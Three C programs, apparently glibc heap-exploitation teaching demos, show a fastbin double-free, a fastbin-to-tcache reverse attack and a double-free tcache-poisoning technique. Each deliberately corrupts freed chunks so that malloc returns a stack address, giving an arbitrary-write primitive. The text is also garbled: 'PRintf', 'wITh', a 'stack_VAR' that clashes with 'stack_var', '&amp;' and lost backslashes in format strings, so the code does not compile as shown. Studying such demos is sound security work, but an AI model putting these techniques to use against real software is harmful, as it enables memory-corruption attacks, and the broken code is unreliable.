#include <stdio.h>
#include <stdlib.h>
#include <assert.h>

int main()
{
	setbuf(stdout, NULL);

	PRintf("This file demonstrates a simple double-free attack wITh fastbins.n");

	printf("Fill up tcache First.n");//是对于fastbin的攻击，所以要先填满tcache
	void *ptrs[8];
	for (int i=0; i<8; i++) {
		ptrs[i] = malloc(8);
	}
	for (int i=0; i<7; i++) {
		free(ptrs[i]);
	}

	printf("Allocating 3 buffers.n");//开三个chunk。free后会进入fastbin中
	int *a = calloc(1, 8);
	int *b = calloc(1, 8);
	int *c = calloc(1, 8);

	printf("1st calloc(1, 8): %pn", a);
	printf("2nd calloc(1, 8): %pn", b);
	printf("3rd calloc(1, 8): %pn", c);

	printf("Freeing the first one...n");
	free(a);

	printf("If we free %p again, things will crash because %p is at the top of the free list.n", a, a);//因为libc2.27的保护机制，位于链表首部的chunk如果被free就会引发异常
	// free(a);

	printf("So, instead, we'll free %p.n", b);
	free(b);//free掉b让链表首部改为b

	printf("Now, we can free %p again, since it's not the head of the free list.n", a);
	free(a);//这样就导致a再一次的进入了fastbin中

	printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!n", a, b, a, a);
	a = calloc(1, 8);
	b = calloc(1, 8);
	c = calloc(1, 8);
	printf("1st calloc(1, 8): %pn", a);
	printf("2nd calloc(1, 8): %pn", b);
	printf("3rd calloc(1, 8): %pn", c);

	assert(a == c);
}

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <assert.h>

const size_t allocsize = 0x40;

int main(){
  setbuf(stdout, NULL);

  printf(
    "n"
    "This attack is intended to have a similar effect to the unsorted_bin_attack,n"
    "except it works with a small allocation size (allocsize <= 0x78).n"
    "The goal is to set things up so that a call to malloc(allocsize) will writen"
    "a large unsigned value to the stack.nn"
  );

  // Allocate 14 times so that we can free later.
  char* ptrs[14];
  size_t i;
  for (i = 0; i < 14; i++) {
    ptrs[i] = malloc(allocsize);
  }

  printf(
    "First we need to free(allocsize) at least 7 times to fill the tcache.n"
    "(More than 7 times works fine too.)nn"
  );

  // Fill the tcache.
  for (i = 0; i < 7; i++) {
    free(ptrs[i]);
  }

  char* victim = ptrs[7];
  printf(
    "The next pointer that we free is the chunk that we're going to corrupt: %pn"
    "It doesn't matter if we corrupt it now or later. Because the tcache isn"
    "already full, it will go in the fastbin.nn",
    victim
  );
  free(victim);

  printf(
    "Next we need to free between 1 and 6 more pointers. These will also gon"
    "in the fastbin. If the stack address that we want to overwrite is not zeron"
    "then we need to free exactly 6 more pointers, otherwise the attack willn"
    "cause a segmentation fault. But if the value on the stack is zero thenn"
    "a single free is sufficient.nn"
  );

  // Fill the fastbin.
  for (i = 8; i < 14; i++) {
    free(ptrs[i]);
  }

  // Create an array on the stack and initialize it with garbage.
  size_t stack_VAR[6];
  memset(stack_var, 0xcd, sizeof(stack_var));

  printf(
    "The stack address that we intend to target: %pn"
    "It's current value is %pn",
    &amp;stack_var[2],
    (char*)stack_var[2]
  );

  printf(
    "Now we use a vulnerability such as a buffer overflow or a use-after-freen"
    "to overwrite the next pointer at address %pnn",
    victim
  );

  //------------VULNERABILITY-----------

  // Overwrite linked list pointer in victim.
  *(size_t**)victim = &stack_var[0];

  //------------------------------------

  printf(
    "The next step is to malloc(allocsize) 7 times to empty the tcache.nn"
  );

  // Empty tcache.
  for (i = 0; i < 7; i++) {
    ptrs[i] = malloc(allocsize);
  }

  printf(
    "Let's just print the contents of our array on the stack now,n"
    "to show that it hasn't been modified yet.nn"
  );

  for (i = 0; i < 6; i++) {
    printf("%p: %pn", &stack_var[i], (char*)stack_var[i]);
  }

  printf(
    "n"
    "The next allocation triggers the stack to be overwritten. The tcachen"
    "is empty, but the fastbin isn't, so the next allocation comes From then"
    "fastbin. Also, 7 chunks from the fastbin are used to refill the tcache.n"
    "Those 7 chunks are copied in reverse order into the tcache, so the stackn"
    "address that we are targeting ends up being the first chunk in the tcache.n"
    "It contains a pointer to the next chunk in the list, which is why a heapn"
    "pointer is written to the stack.n"
    "n"
    "Earlier we said that the attack will also work if we free fewer than 6n"
    "extra pointers to the fastbin, but only if the value on the stack is zero.n"
    "That's because the value on the stack is treated as a next pointer in then"
    "linked list and it will trigger a crash if it isn't a valid pointer or null.n"
    "n"
    "The contents of our array on the stack now look like this:nn"
  );

  malloc(allocsize);

  for (i = 0; i < 6; i++) {
    printf("%p: %pn", &stack_var[i], (char*)stack_var[i]);
  }

  char *q = malloc(allocsize);
  printf(
    "n"
    "Finally, if we malloc one more time then we get the stack address back: %pn",
    q
  );

  assert(q == (char *)&stack_var[2]);

  return 0;
}

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>


int main()
{
    /*
     * This attack should bypass the restriction introduced in
     * https://sourceware.org/git/?p=glibc.git;a=commit;h=bcdaad21d4635931d1bd3b54a7894276925d081d
     * If the libc does not include the restriction, you can simply double free the victim and do a
     * simple tcache poisoning
     * And thanks to @anton00b and @subwire for the weird name of this technique */

    // disable buffering so _IO_FILE does not interfere with our heap
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    // introduction
    puts("This file demonstrates a powerful tcache poisoning attack by tricking malloc into");
    puts("returning a pointer to an arbitrary location (in this demo, the stack).");
    puts("This attack only relies on double free.n");

    // prepare the target
    intptr_t stack_var[4];
    puts("The address we want malloc() to return, namely,");
    printf("the target address is %p.nn", stack_var);

    // prepare heap layout
    puts("Preparing heap layout");
    puts("Allocating 7 chunks(malloc(0X100)) for us to fill up tcache list later.");
    intptr_t *x[7];
    for(int i=0; i<sizeof(x)/sizeof(intptr_t*); i++){
        x[i] = malloc(0x100);
    }
    puts("Allocating a chunk for later consolidation");
    intptr_t *prev = malloc(0x100);
    puts("Allocating the victim chunk.");
    intptr_t *a = malloc(0x100);
    printf("malloc(0x100): a=%p.n", a); 
    puts("Allocating a padding to prevent consolidation.n");
    malloc(0x10);
    
    // cause chunk overlapping
    puts("Now we are able to cause chunk overlapping");
    puts("Step 1: fill up tcache list");
    for(int i=0; i<7; i++){
        free(x[i]);
    }
    puts("Step 2: free the victim chunk so it will be added to unsorted bin");
    free(a);
    
    puts("Step 3: free the previous chunk and make it consolidate with the victim chunk.");
    free(prev);
    
    puts("Step 4: add the victim chunk to tcache list by taking one out from it and free victim againn");
    malloc(0x100);
    /*VULNERABILITY*/
    free(a);// a is already freed
    /*VULNERABILITY*/
    
    // simple tcache poisoning
    puts("Launch tcache poisoning");
    puts("Now the victim is contained in a larger freed chunk, we can do a simple tcache poisoning by using overlapPEd chunk");
    intptr_t *b = malloc(0x120);
    puts("We simply overwrite victim's fwd pointer");
    b[0x120/8-2] = (long)stack_var;
    
    // take target out
    puts("Now we can cash out the target chunk.");
    malloc(0x100);
    intptr_t *c = malloc(0x100);
    printf("The new chunk is at %pn", c);
    
    // sanity check
    assert(c==stack_var);
    printf("Got control on target/stack!nn");
    
    // note
    puts("Note:");
    puts("And the wonderful thing about this exploitation is that: you can free b, victim again and modify the fwd pointer of victim");
    puts("In that case, once you have done this exploitation, you can have many arbitary writes very easily.");

    return 0;
}